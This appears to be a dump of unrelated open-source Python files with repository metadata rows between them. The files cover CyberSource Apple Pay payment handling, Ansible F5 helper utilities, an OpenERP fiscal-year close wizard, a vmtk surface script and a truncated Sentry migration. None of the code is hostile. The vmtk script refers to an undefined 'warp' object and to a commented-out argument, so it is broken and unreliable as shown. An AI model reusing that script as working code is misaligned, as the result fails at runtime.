'run': 'true',
}
capture_service = {
'run': 'true',
}
# Enable Export Compliance for SDN validation, amongst other checks.
# See https://www.cybersource.com/products/fraud_management/export_compliance/
export_service = {
'run': 'true',
}
item = [{
'id': index,
'productCode': line.product.get_product_class().slug,
'productName': clean_field_value(line.product.title),
'quantity': line.quantity,
'productSKU': line.stockrecord.partner_sku,
'taxAmount': str(line.line_tax),
'unitPrice': str(line.unit_price_incl_tax),
} for index, line in enumerate(basket.all_lines())]
response = client.service.runTransaction(
merchantID=self.merchant_id,
merchantReferenceCode=basket.order_number,
billTo=bill_to,
purchaseTotals=purchase_totals,
encryptedPayment=encrypted_payment,
card=card,
ccAuthService=auth_service,
ccCaptureService=capture_service,
exportService=export_service,
paymentSolution='001',
item=item,
)
except:
msg = 'An error occurred while authorizing an Apple Pay (via CyberSource) for basket [{}]'.format(basket.id)
logger.exception(msg)
raise GatewayError(msg)
request_id = response.requestID
ppr = self.record_processor_response(serialize_object(response), transaction_id=request_id, basket=basket)
if response.decision == 'ACCEPT':
currency = basket.currency
total = basket.total_incl_tax
transaction_id = request_id
return HandledProcessorResponse(
transaction_id=transaction_id,
total=total,
currency=currency,
card_number='Apple Pay',
card_type=CYBERSOURCE_CARD_TYPE_MAP.get(card_type)
)
msg = ('CyberSource rejected an Apple Pay authorization request for basket [{basket_id}]. '
'Complete response has been recorded in entry [{response_id}]')
msg = msg.format(basket_id=basket.id, response_id=ppr.id)
logger.warning(msg)
raise GatewayError(msg)
| agpl-3.0 | 4,043,310,190,785,671,700 | 44.665414 | 120 | 0.625093 | false |
ptisserand/ansible | lib/ansible/module_utils/network/f5/common.py | 14 | 9070 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback
from ansible.module_utils.connection import exec_command
from ansible.module_utils.network.common.utils import to_list, ComplexList
from ansible.module_utils.six import iteritems
from collections import defaultdict
try:
from icontrol.exceptions import iControlUnexpectedHTTPError
HAS_F5SDK = True
except ImportError:
HAS_F5SDK = False
f5_provider_spec = {
'server': dict(
fallback=(env_fallback, ['F5_SERVER'])
),
'server_port': dict(
type='int',
default=443,
fallback=(env_fallback, ['F5_SERVER_PORT'])
),
'user': dict(
fallback=(env_fallback, ['F5_USER', 'ANSIBLE_NET_USERNAME'])
),
'password': dict(
no_log=True,
aliases=['pass', 'pwd'],
fallback=(env_fallback, ['F5_PASSWORD', 'ANSIBLE_NET_PASSWORD'])
),
'ssh_keyfile': dict(
fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']),
type='path'
),
'validate_certs': dict(
type='bool',
fallback=(env_fallback, ['F5_VALIDATE_CERTS'])
),
'transport': dict(
default='rest',
choices=['cli', 'rest']
),
'timeout': dict(type='int'),
}
f5_argument_spec = {
'provider': dict(type='dict', options=f5_provider_spec),
}
f5_top_spec = {
'server': dict(
removed_in_version=2.9,
fallback=(env_fallback, ['F5_SERVER'])
),
'user': dict(
removed_in_version=2.9,
fallback=(env_fallback, ['F5_USER', 'ANSIBLE_NET_USERNAME'])
),
'password': dict(
removed_in_version=2.9,
no_log=True,
aliases=['pass', 'pwd'],
fallback=(env_fallback, ['F5_PASSWORD', 'ANSIBLE_NET_PASSWORD'])
),
'validate_certs': dict(
removed_in_version=2.9,
type='bool',
fallback=(env_fallback, ['F5_VALIDATE_CERTS'])
),
'server_port': dict(
removed_in_version=2.9,
type='int',
default=443,
fallback=(env_fallback, ['F5_SERVER_PORT'])
),
'transport': dict(
removed_in_version=2.9,
default='rest',
choices=['cli', 'rest']
)
}
f5_argument_spec.update(f5_top_spec)
def get_provider_argspec():
return f5_provider_spec
def load_params(params):
provider = params.get('provider') or dict()
for key, value in iteritems(provider):
if key in f5_argument_spec:
if params.get(key) is None and value is not None:
params[key] = value
# Fully Qualified name (with the partition)
def fqdn_name(partition, value):
if value is not None and not value.startswith('/'):
return '/{0}/{1}'.format(partition, value)
return value
# Fully Qualified name (with partition) for a list
def fq_list_names(partition, list_names):
if list_names is None:
return None
return map(lambda x: fqdn_name(partition, x), list_names)
def to_commands(module, commands):
spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
transform = ComplexList(spec, module)
return transform(commands)
def run_commands(module, commands, check_rc=True):
responses = list()
commands = to_commands(module, to_list(commands))
for cmd in commands:
cmd = module.jsonify(cmd)
rc, out, err = exec_command(module, cmd)
if check_rc and rc != 0:
raise F5ModuleError(to_text(err, errors='surrogate_then_replace'))
responses.append(to_text(out, errors='surrogate_then_replace'))
return responses
def cleanup_tokens(client):
try:
resource = client.api.shared.authz.tokens_s.token.load(
name=client.api.icrs.token
)
resource.delete()
except Exception:
pass
def is_cli(module):
transport = module.params['transport']
provider_transport = (module.params['provider'] or {}).get('transport')
result = 'cli' in (transport, provider_transport)
return result
def is_valid_hostname(host):
"""Reasonable attempt at validating a hostname
Compiled from various paragraphs outlined here
https://tools.ietf.org/html/rfc3696#section-2
https://tools.ietf.org/html/rfc1123
Notably,
* Host software MUST handle host names of up to 63 characters and
SHOULD handle host names of up to 255 characters.
* The "LDH rule", after the characters that it permits. (letters, digits, hyphen)
* If the hyphen is used, it is not permitted to appear at
either the beginning or end of a label
:param host:
:return:
"""
if len(host) > 255:
return False
host = host.rstrip(".")
allowed = re.compile(r'(?!-)[A-Z0-9-]{1,63}(?<!-)$', re.IGNORECASE)
result = all(allowed.match(x) for x in host.split("."))
return result
class Noop(object):
"""Represent no-operation required
This class is used in the Difference engine to specify when an attribute
has not changed. Difference attributes may return an instance of this
class as a means to indicate when the attribute has not changed.
The Noop object allows attributes to be set to None when sending updates
to the API. `None` is technically a valid value in some cases (it indicates
that the attribute should be removed from the resource).
"""
pass
class F5BaseClient(object):
def __init__(self, *args, **kwargs):
self.params = kwargs
load_params(self.params)
self._client = None
@property
def api(self):
raise F5ModuleError("Management root must be used from the concrete product classes.")
def reconnect(self):
"""Attempts to reconnect to a device
The existing token from a ManagementRoot can become invalid if you,
for example, upgrade the device (such as is done in the *_software
module.
This method can be used to reconnect to a remote device without
having to re-instantiate the ArgumentSpec and AnsibleF5Client classes
it will use the same values that were initially provided to those
classes
:return:
:raises iControlUnexpectedHTTPError
"""
self._client = self.mgmt
class AnsibleF5Parameters(object):
def __init__(self, *args, **kwargs):
self._values = defaultdict(lambda: None)
self._values['__warnings'] = []
self.client = kwargs.pop('client', None)
self._module = kwargs.pop('module', None)
self._params = {}
params = kwargs.pop('params', None)
if params:
self.update(params=params)
self._params.update(params)
def update(self, params=None):
if params:
self._params.update(params)
for k, v in iteritems(params):
if self.api_map is not None and k in self.api_map:
map_key = self.api_map[k]
else:
map_key = k
# Handle weird API parameters like `dns.proxy.__iter__` by
# using a map provided by the module developer
class_attr = getattr(type(self), map_key, None)
if isinstance(class_attr, property):
# There is a mapped value for the api_map key
if class_attr.fset is None:
# If the mapped value does not have
# an associated setter
self._values[map_key] = v
else:
# The mapped value has a setter
setattr(self, map_key, v)
else:
# If the mapped value is not a @property
self._values[map_key] = v
def api_params(self):
result = {}
for api_attribute in self.api_attributes:
if self.api_map is not None and api_attribute in self.api_map:
result[api_attribute] = getattr(self, self.api_map[api_attribute])
else:
result[api_attribute] = getattr(self, api_attribute)
result = self._filter_params(result)
return result
def __getattr__(self, item):
# Ensures that properties that weren't defined, and therefore stashed
# in the `_values` dict, will be retrievable.
return self._values[item]
@property
def partition(self):
if self._values['partition'] is None:
return 'Common'
return self._values['partition'].strip('/')
@partition.setter
def partition(self, value):
self._values['partition'] = value
def _filter_params(self, params):
return dict((k, v) for k, v in iteritems(params) if v is not None)
class F5ModuleError(Exception):
pass
| gpl-3.0 | 1,302,024,279,466,081,800 | 29.641892 | 94 | 0.605292 | false |
ntiufalara/openerp7 | openerp/addons/account/wizard/account_fiscalyear_close_state.py | 35 | 2537 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class account_fiscalyear_close_state(osv.osv_memory):
"""
Closes Account Fiscalyear
"""
_name = "account.fiscalyear.close.state"
_description = "Fiscalyear Close state"
_columns = {
'fy_id': fields.many2one('account.fiscalyear', \
'Fiscal Year to Close', required=True, help="Select a fiscal year to close"),
}
def data_save(self, cr, uid, ids, context=None):
"""
This function close account fiscalyear
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of Account fiscalyear close state’s IDs
"""
for data in self.read(cr, uid, ids, context=context):
fy_id = data['fy_id'][0]
cr.execute('UPDATE account_journal_period ' \
'SET state = %s ' \
'WHERE period_id IN (SELECT id FROM account_period \
WHERE fiscalyear_id = %s)',
('done', fy_id))
cr.execute('UPDATE account_period SET state = %s ' \
'WHERE fiscalyear_id = %s', ('done', fy_id))
cr.execute('UPDATE account_fiscalyear ' \
'SET state = %s WHERE id = %s', ('done', fy_id))
return {'type': 'ir.actions.act_window_close'}
account_fiscalyear_close_state()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| mit | -5,330,334,011,736,422,000 | 40.52459 | 110 | 0.578366 | false |
kayarre/Tools | vmtk/calc_polygon.py | 1 | 1712 |
#!/usr/bin/env python
import vtk
import numpy as np
from vmtk import vmtkscripts
from vmtk import vtkvmtk
import argparse
import copy
# creates lines normal to surface for evaluation in the probe image with surface
def warp_surface(args):
print("warp the surface ")
reader = vmtkscripts.vmtkSurfaceReader()
reader.InputFileName = args.surface
reader.Execute()
Surface = reader.Surface
boundaries = vtkvmtk.vtkvmtkPolyDataBoundaryExtractor()
boundaries.SetInputData(Surface)
boundaries.Update()
boundaryReferenceSystems = vtkvmtk.vtkvmtkBoundaryReferenceSystems()
boundaryReferenceSystems.SetInputData(Surface)
boundaryReferenceSystems.SetBoundaryRadiusArrayName('BoundaryRadius')
boundaryReferenceSystems.SetBoundaryNormalsArrayName('BoundaryNormals')
boundaryReferenceSystems.SetPoint1ArrayName('Point1')
boundaryReferenceSystems.SetPoint2ArrayName('Point2')
boundaryReferenceSystems.Update()
ReferenceSystems = boundaryReferenceSystems.GetOutput()
writer = vmtkscripts.vmtkSurfaceWriter()
writer.OutputFileName = args.file_out
writer.Input = warp.GetOutput()
writer.Execute()
if __name__=='__main__':
parser = argparse.ArgumentParser(description='estimate vertices for uniform point distribution')
parser.add_argument("-i", dest="surface", required=True, help="input surface file", metavar="FILE")
#parser.add_argument("-o", dest="file_out", required=True, help="output surface file", metavar="FILE")
#parser.add_argument("-s", '--scale', dest="fuzz_scale", type=float, help='how much to fuzz surface ', default=0.08)
args = parser.parse_args()
#print(args)
warp_surface(args)
| bsd-2-clause | -482,486,886,400,741,900 | 31.923077 | 121 | 0.744159 | false |
SilentCircle/sentry | src/sentry/migrations/0089_auto__add_accessgroup__add_unique_accessgroup_team_name.py | 3 | 27708 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'AccessGroup'
db.create_table('sentry_accessgroup', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sentry.Team'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('type', self.gf('django.db.models.fields.IntegerField')(default=50)),
('managed', self.gf('django.db.models.fields.BooleanField')(default=False)),
('data', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['AccessGroup'])
# Adding M2M table for field projects on 'AccessGroup'
db.create_table('sentry_accessgroup_projects', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('accessgroup', models.ForeignKey(orm['sentry.accessgroup'], null=False)),
('project', models.ForeignKey(orm['sentry.project'], null=False))
))
db.create_unique('sentry_accessgroup_projects', ['accessgroup_id', 'project_id'])
# Adding M2M table for field members on 'AccessGroup'
db.create_table('sentry_accessgroup_members', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('accessgroup', models.ForeignKey(orm['sentry.accessgroup'], null=False)),
('user', models.ForeignKey(orm['auth.user'], null=False))
))
db.create_unique('sentry_accessgroup_members', ['accessgroup_id', 'user_id'])
# Adding unique constraint on 'AccessGroup', fields ['team', 'name']
db.create_unique('sentry_accessgroup', ['team_id', 'name'])
def backwards(self, orm):
# Removing unique constraint on 'AccessGroup', fields ['team', 'name']
db.delete_unique('sentry_accessgroup', ['team_id', 'name'])
# Deleting model 'AccessGroup'
db.delete_table('sentry_accessgroup')
# Removing M2M table for field projects on 'AccessGroup'
db.delete_table('sentry_accessgroup_projects')
# Removing M2M table for field members on 'AccessGroup'
db.delete_table('sentry_accessgroup_members')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'})
},
'sentry.affecteduserbygroup': {
'Meta': {'unique_together': "(('project', 'tuser', 'group'),)", 'object_name': 'AffectedUserByGroup'},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'tuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.TrackedUser']", 'null': 'True'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filterkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'FilterKey'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'users_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['auth.User']"})
},
'sentry.groupcountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'GroupCountByMinute', 'db_table': "'sentry_messagecountbyminute'"},
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouptag': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTag', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sentry_owned_project_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Team']", 'null': 'True'})
},
'sentry.projectcountbyminute': {
'Meta': {'unique_together': "(('project', 'date'),)", 'object_name': 'ProjectCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'user_added': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['auth.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('picklefield.fields.PickledObjectField', [], {})
},
'sentry.searchdocument': {
